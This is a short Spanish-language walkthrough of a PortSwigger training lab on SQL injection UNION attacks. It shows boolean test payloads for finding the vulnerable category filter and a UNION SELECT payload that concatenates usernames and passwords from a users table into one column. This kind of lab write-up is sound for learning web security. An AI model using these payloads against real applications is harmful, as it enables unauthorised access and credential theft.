Lab: SQL injection UNION attack, retrieving multiple values in a single column
Ataque de inyección SQL mediante UNION, extrayendo múltiples valores en una sola columna.
Información del laboratorio
https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns
En este laboratorio hay una vulnerabilidad de inyección SQL en el filtro de la categoría del producto.
Esta vulnerabilidad es similar a las de los laboratorios:
Flujo de explotación
Identificación del parámetro vulnerable
Para verificar que es vulnerable, se usan payloads con el operador lógico AND, por ejemplo: 'and'1337'='1337
y 'and'1337'='1338
.
Se identifica de la misma forma que el laboratorio: Lab: SQL injection UNION attack, retrieving data from other tables
Obtención de usuarios y contraseñas en una misma columna
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

Como se puede observar, en la segunda columna se muestra el valor de ambas columnas:
username~password

Última actualización
¿Te fue útil?